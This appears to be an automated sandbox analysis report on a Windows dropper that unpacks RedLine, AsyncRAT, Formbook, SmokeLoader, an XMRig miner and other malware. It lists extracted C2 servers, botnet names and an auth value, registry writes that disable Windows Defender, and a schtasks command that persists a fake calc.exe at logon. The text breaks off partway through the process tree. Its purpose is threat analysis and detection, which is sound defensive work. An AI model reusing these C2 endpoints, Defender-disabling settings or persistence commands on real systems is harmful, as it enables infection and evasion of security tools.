asyncrat | 76a7490d3f1b0685f60a417d1c9cf96927b473825a914221f092f82ea112b571

max time kernel
50s
max time network
756s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
23-10-2023 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

800a6337b0b38274efe64875d15f70c5
SHA1

6b0858c5f9a2e2b5980aac05749e3d6664a60870
SHA256

76a7490d3f1b0685f60a417d1c9cf96927b473825a914221f092f82ea112b571
SHA512

bf337140044a4674d69f7a2db30389e248593a99826c8731bc0a5ac71e46819eb539d8c7cbeab48108310359f5604e02e3bd64f17d9fdd380b574f329543645e
SSDEEP

48:6O/tGt28lK9iqmcfaFXfkeLJhyPFlWa8tYb/INV/cpwOulavTqXSfbNtm:j/IUiqtaJkeqDUt5xcpmsvNzNt

Malware Config

Extracted

Family

redline

Botnet

@DominatorOfMamont

vikaneleneer.shop:80

Attributes

auth_value
37db34188c1a0ff5ee85cb5c06da0d81

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

89.23.100.93:4449

Mutex

oonrejgwedvxwse

Attributes

delay
1
install
true
install_file
calc.exe
install_folder
%AppData%

aes.plain

Extracted

Family

formbook

Version

4.1

Campaign

sy22

Decoy

vinteligencia.com

displayfridges.fun

completetip.com

giallozafferrano.com

jizihao1.com

mysticheightstrail.com

fourseasonslb.com

kjnala.shop

mosiacwall.com

vandistreet.com

gracefullytouchedartistry.com

hbiwhwr.shop

mfmz.net

hrmbrillianz.com

funwarsztat.com

polewithcandy.com

ourrajasthan.com

wilhouettteamerica.com

johnnystintshop.com

asgnelwin.com

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.1

Botnet

Default

127.0.0.1:4449

20.211.121.138:4449

Mutex

udbyxlklndgyt

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

smokeloader

Version

2022

http://77.91.68.29/fks/

rc4.i32

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/memory/1324-238-0x0000000001F70000-0x0000000001FCA000-memory.dmp	family_redline
behavioral1/memory/4128-306-0x0000000000400000-0x000000000047E000-memory.dmp	family_redline
behavioral1/memory/4128-309-0x00000000020B0000-0x000000000210A000-memory.dmp	family_redline
behavioral1/memory/1324-370-0x0000000000400000-0x000000000047E000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 5 IoCs

rat

resource	yara_rule
behavioral1/memory/4052-21-0x00000000005A0000-0x00000000005B8000-memory.dmp	asyncrat
behavioral1/memory/4052-67-0x0000000000400000-0x000000000043F000-memory.dmp	asyncrat
behavioral1/memory/4940-437-0x0000000002040000-0x0000000002058000-memory.dmp	asyncrat
behavioral1/memory/4940-442-0x0000000000400000-0x000000000043F000-memory.dmp	asyncrat
behavioral1/memory/5788-865-0x0000000000400000-0x0000000000418000-memory.dmp	asyncrat

Formbook payload 4 IoCs

rat

resource	yara_rule
behavioral1/memory/4992-278-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/4992-369-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/4564-445-0x0000000000B00000-0x0000000000B2F000-memory.dmp	formbook
behavioral1/memory/4564-881-0x0000000000B00000-0x0000000000B2F000-memory.dmp	formbook

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/4976-923-0x00007FF7BFE20000-0x00007FF7C0923000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
55	4940	schtasks.exe

Contacts a large (1431) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 43 IoCs

pid	Process
3624	dll.exe
4052	cbchr.exe
4904	Legacysurvival.exe
3296	boblspsqgegf.exe
1348	newumma.exe
1324	ca.exe
4532	toolspub2.exe
1020	kos2.exe
1408	audiodgse.exe
712	latestX.exe
816	ohtfjmxqk.exe
4128	fra.exe
4032	set16.exe
4624	K.exe
5028	bus50.exe
4356	is-SOF2A.tmp
4992	ohtfjmxqk.exe
2232	pd8Ty33.exe
2824	LO0Gz18.exe
1456	toolspub2.exe
208	Ez4Zp00.exe
4376	bp5ag06.exe
2556	Legacysurvival.exe
2244	schtasks.exe
4948	2UB5109.exe
4940	calc.exe
4332	MyBurn.exe
4536	Veeam.Backup.Service.exe
4680	explorer.exe
3464	3xz56pU.exe
5108	schtasks.exe
5392	4Kf202vY.exe
5896	shareu.exe
5824	Legacysurvival.exe
4976	xmrig.exe
3616	WatchDog.exe
920	reg.exe
2156	plugmanzx.exe
5132	damianozx.exe
1956	Legacysurvival.exe
528	Legacysurvival.exe
2556	schtasks.exe
5420	987123.exe

Loads dropped DLL 16 IoCs

pid	Process
4904	Legacysurvival.exe
4904	Legacysurvival.exe
1324	ca.exe
1324	ca.exe
4356	is-SOF2A.tmp
4356	is-SOF2A.tmp
4356	is-SOF2A.tmp
4128	fra.exe
4128	fra.exe
4904	Legacysurvival.exe
5824	Legacysurvival.exe
5824	Legacysurvival.exe
5824	Legacysurvival.exe
528	Legacysurvival.exe
1956	Legacysurvival.exe
2556	schtasks.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
8912	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000600000001ae0c-4199.dat	themida

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001abd4-59.dat	upx
behavioral1/files/0x000600000001abd4-57.dat	upx
behavioral1/memory/3296-60-0x0000000000EA0000-0x0000000001D3D000-memory.dmp	upx
behavioral1/memory/3296-283-0x0000000000EA0000-0x0000000001D3D000-memory.dmp	upx
behavioral1/memory/3296-374-0x0000000000EA0000-0x0000000001D3D000-memory.dmp	upx
behavioral1/files/0x000700000001ac40-1474.dat	upx
behavioral1/files/0x000700000001aca5-1763.dat	upx
behavioral1/files/0x000600000001ad1a-2291.dat	upx
behavioral1/files/0x000600000001adb8-3218.dat	upx
behavioral1/files/0x000600000001aef2-5585.dat	upx
behavioral1/files/0x000600000001af19-5750.dat	upx
behavioral1/files/0x000600000001af4d-7049.dat	upx
behavioral1/files/0x000600000001af8f-10653.dat	upx
behavioral1/files/0x000600000001af98-10702.dat	upx
behavioral1/files/0x000600000001afbd-11324.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.159.66.125

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000800000001af0a-5648.dat	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Ez4Zp00.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	bp5ag06.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	bus50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	pd8Ty33.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	LO0Gz18.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 33 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
67	ipinfo.io
7661	ipinfo.io
9101	api.ipify.org
9597	ipinfo.io
64	ipinfo.io
285	ipinfo.io
6042	api.2ip.ua
6053	api.ipify.org
9099	api.ipify.org
9591	api.myip.com
169	ipinfo.io
282	api.myip.com
396	api.ipify.org
6040	api.2ip.ua
6054	api.ipify.org
7646	api.myip.com
9590	api.myip.com
167	api.myip.com
168	api.myip.com
383	api.ipify.org
392	api.ipify.org
2997	api.2ip.ua
6191	api.ipify.org
9598	ipinfo.io
281	api.myip.com
381	api.ipify.org
7642	api.myip.com
7665	ipinfo.io
2995	api.2ip.ua
9337	api.ipify.org
284	ipinfo.io
384	api.ipify.org
9339	api.ipify.org

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 816 set thread context of 4992	816	ohtfjmxqk.exe	99
PID 4992 set thread context of 3264	4992	ohtfjmxqk.exe	51
PID 2556 set thread context of 3380	2556	Legacysurvival.exe	123
PID 3464 set thread context of 2604	3464	3xz56pU.exe	471
PID 5108 set thread context of 5788	5108	schtasks.exe	134
PID 4564 set thread context of 3264	4564	wlanext.exe	51

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MyBurn\is-ME0F9.tmp	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\is-2AM22.tmp	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\is-RTEFJ.tmp	is-SOF2A.tmp
File opened for modification	C:\Program Files (x86)\MyBurn\unins000.dat	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\unins000.dat	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\is-LPAC4.tmp	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\is-21IBP.tmp	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\is-F9DR4.tmp	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\is-F6QPI.tmp	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\Sounds\is-IAATM.tmp	is-SOF2A.tmp
File created	C:\Program Files (x86)\MyBurn\Sounds\is-5VPU4.tmp	is-SOF2A.tmp
File opened for modification	C:\Program Files (x86)\MyBurn\MyBurn.exe	is-SOF2A.tmp

Launches sc.exe 50 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6456	sc.exe
11008	sc.exe
7488	sc.exe
6952	sc.exe
8840	sc.exe
11220	sc.exe
6148	sc.exe
7820	sc.exe
4708	sc.exe
440	sc.exe
5076	sc.exe
6756	sc.exe
8904	sc.exe
9024	sc.exe
7860	sc.exe
10696	sc.exe
7696	sc.exe
8340	sc.exe
3472	sc.exe
7368	sc.exe
8612	sc.exe
7984	sc.exe
5980	sc.exe
3920	sc.exe
3492	sc.exe
5500	sc.exe
11044	sc.exe
10336	sc.exe
7784	sc.exe
8728	sc.exe
3252	sc.exe
10960	sc.exe
10584	sc.exe
6644	sc.exe
1516	sc.exe
10776	sc.exe
8988	sc.exe
8604	sc.exe
8904	sc.exe
10112	sc.exe
10824	sc.exe
204	sc.exe
10972	sc.exe
4616	sc.exe
8056	sc.exe
8860	sc.exe
2604	sc.exe
5396	sc.exe
9232	sc.exe
9420	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4108	1324	WerFault.exe	88
5084	4128	WerFault.exe	96
3460	4940	WerFault.exe	121
2196	3616	WerFault.exe	140
1156	9664	WerFault.exe	764
9260	4568	WerFault.exe	797

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sc.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
8	schtasks.exe
6560	schtasks.exe
7580	schtasks.exe
3568	schtasks.exe
10512	schtasks.exe
4876	schtasks.exe
7408	schtasks.exe
1856	schtasks.exe
9364	schtasks.exe
9240	schtasks.exe
4940	schtasks.exe
10964	schtasks.exe
5380	schtasks.exe
7680	schtasks.exe
9984	schtasks.exe
10192	schtasks.exe
348	schtasks.exe
8400	schtasks.exe
8928	schtasks.exe
9656	schtasks.exe
10796	schtasks.exe
5296	schtasks.exe
4628	schtasks.exe
11220	schtasks.exe
10528	schtasks.exe
7764	schtasks.exe
6304	schtasks.exe
7068	schtasks.exe
10084	schtasks.exe
6000	schtasks.exe
10992	schtasks.exe
6888	schtasks.exe
11228	schtasks.exe
9268	schtasks.exe
424	schtasks.exe
5108	schtasks.exe
8716	schtasks.exe
8568	schtasks.exe
9384	schtasks.exe
6592	schtasks.exe
9808	schtasks.exe
3800	schtasks.exe
10892	schtasks.exe
10696	schtasks.exe
8796	schtasks.exe
8	schtasks.exe
6904	schtasks.exe
680	schtasks.exe

Delays execution with timeout.exe 11 IoCs

evasion

pid	Process
6524	timeout.exe
6008	timeout.exe
1804	timeout.exe
9208	timeout.exe
7140	timeout.exe
10728	timeout.exe
10972	timeout.exe
5380	timeout.exe
8404	timeout.exe
10056	timeout.exe
9956	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
5496	taskkill.exe
4588	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
7984	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
4052	cbchr.exe
1456	toolspub2.exe
1456	toolspub2.exe
4992	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
3380	AppLaunch.exe
3380	AppLaunch.exe
3380	AppLaunch.exe
3624	netTimer.exe
3624	netTimer.exe
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3624	Process not Found
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
4564	wlanext.exe
4564	wlanext.exe
4564	wlanext.exe
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
2604	sc.exe
2604	sc.exe
3264	Explorer.EXE
3264	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
816	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
4992	ohtfjmxqk.exe
1456	toolspub2.exe
2604	sc.exe
4564	wlanext.exe
4564	wlanext.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	652	a.exe
Token: SeDebugPrivilege	4052	cbchr.exe
Token: SeSecurityPrivilege	4904	Legacysurvival.exe
Token: SeDebugPrivilege	3624	netTimer.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	4624	K.exe
Token: SeDebugPrivilege	4992	ohtfjmxqk.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	3380	AppLaunch.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	4564	wlanext.exe
Token: SeDebugPrivilege	4940	schtasks.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	5788	CasPol.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5824	Legacysurvival.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4940	schtasks.exe
5788	CasPol.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 652 wrote to memory of 3624	652	a.exe	72
PID 652 wrote to memory of 3624	652	a.exe	72
PID 652 wrote to memory of 3624	652	a.exe	72
PID 652 wrote to memory of 4052	652	a.exe	74
PID 652 wrote to memory of 4052	652	a.exe	74
PID 652 wrote to memory of 4052	652	a.exe	74
PID 652 wrote to memory of 4904	652	a.exe	76
PID 652 wrote to memory of 4904	652	a.exe	76
PID 652 wrote to memory of 4904	652	a.exe	76
PID 652 wrote to memory of 3296	652	a.exe	77
PID 652 wrote to memory of 3296	652	a.exe	77
PID 4052 wrote to memory of 5084	4052	cbchr.exe	110
PID 4052 wrote to memory of 5084	4052	cbchr.exe	110
PID 4052 wrote to memory of 5084	4052	cbchr.exe	110
PID 4052 wrote to memory of 2604	4052	cbchr.exe	471
PID 4052 wrote to memory of 2604	4052	cbchr.exe	471
PID 4052 wrote to memory of 2604	4052	cbchr.exe	471
PID 3296 wrote to memory of 4588	3296	boblspsqgegf.exe	83
PID 3296 wrote to memory of 4588	3296	boblspsqgegf.exe	83
PID 5084 wrote to memory of 424	5084	WerFault.exe	85
PID 5084 wrote to memory of 424	5084	WerFault.exe	85
PID 5084 wrote to memory of 424	5084	WerFault.exe	85
PID 2604 wrote to memory of 1804	2604	sc.exe	87
PID 2604 wrote to memory of 1804	2604	sc.exe	87
PID 2604 wrote to memory of 1804	2604	sc.exe	87
PID 652 wrote to memory of 1348	652	a.exe	86
PID 652 wrote to memory of 1348	652	a.exe	86
PID 652 wrote to memory of 1348	652	a.exe	86
PID 652 wrote to memory of 1324	652	a.exe	88
PID 652 wrote to memory of 1324	652	a.exe	88
PID 652 wrote to memory of 1324	652	a.exe	88
PID 1348 wrote to memory of 4532	1348	newumma.exe	90
PID 1348 wrote to memory of 4532	1348	newumma.exe	90
PID 1348 wrote to memory of 4532	1348	newumma.exe	90
PID 1348 wrote to memory of 1020	1348	newumma.exe	91
PID 1348 wrote to memory of 1020	1348	newumma.exe	91
PID 1348 wrote to memory of 1020	1348	newumma.exe	91
PID 652 wrote to memory of 1408	652	a.exe	93
PID 652 wrote to memory of 1408	652	a.exe	93
PID 652 wrote to memory of 1408	652	a.exe	93
PID 1348 wrote to memory of 712	1348	newumma.exe	92
PID 1348 wrote to memory of 712	1348	newumma.exe	92
PID 1408 wrote to memory of 816	1408	audiodgse.exe	94
PID 1408 wrote to memory of 816	1408	audiodgse.exe	94
PID 1408 wrote to memory of 816	1408	audiodgse.exe	94
PID 652 wrote to memory of 4128	652	a.exe	96
PID 652 wrote to memory of 4128	652	a.exe	96
PID 652 wrote to memory of 4128	652	a.exe	96
PID 1020 wrote to memory of 4032	1020	kos2.exe	97
PID 1020 wrote to memory of 4032	1020	kos2.exe	97
PID 1020 wrote to memory of 4032	1020	kos2.exe	97
PID 1020 wrote to memory of 4624	1020	kos2.exe	107
PID 1020 wrote to memory of 4624	1020	kos2.exe	107
PID 652 wrote to memory of 5028	652	a.exe	106
PID 652 wrote to memory of 5028	652	a.exe	106
PID 652 wrote to memory of 5028	652	a.exe	106
PID 4032 wrote to memory of 4356	4032	set16.exe	98
PID 4032 wrote to memory of 4356	4032	set16.exe	98
PID 4032 wrote to memory of 4356	4032	set16.exe	98
PID 816 wrote to memory of 4992	816	ohtfjmxqk.exe	99
PID 816 wrote to memory of 4992	816	ohtfjmxqk.exe	99
PID 816 wrote to memory of 4992	816	ohtfjmxqk.exe	99
PID 816 wrote to memory of 4992	816	ohtfjmxqk.exe	99
PID 5028 wrote to memory of 2232	5028	bus50.exe	104

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
10428	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
- C:\Users\Admin\AppData\Local\Temp\a.exe
  "C:\Users\Admin\AppData\Local\Temp\a.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Users\Admin\AppData\Local\Temp\a\dll.exe
    "C:\Users\Admin\AppData\Local\Temp\a\dll.exe"
    3⤵
    - Executes dropped EXE
    PID:3624
- - C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"' & exit
      4⤵
      PID:5084
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD8CC.tmp.bat""
      4⤵
      PID:2604
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1804
    - - C:\Users\Admin\AppData\Roaming\calc.exe
        
        "C:\Users\Admin\AppData\Roaming\calc.exe"
        5⤵
        Executes dropped EXE
        
        PID:4940
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 3184
        6⤵
        Program crash
        
        PID:3460
- - C:\Users\Admin\AppData\Local\Temp\a\Legacysurvival.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Legacysurvival.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe
      C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of FindShellTrayWindow
      PID:5824
    - - C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe
        
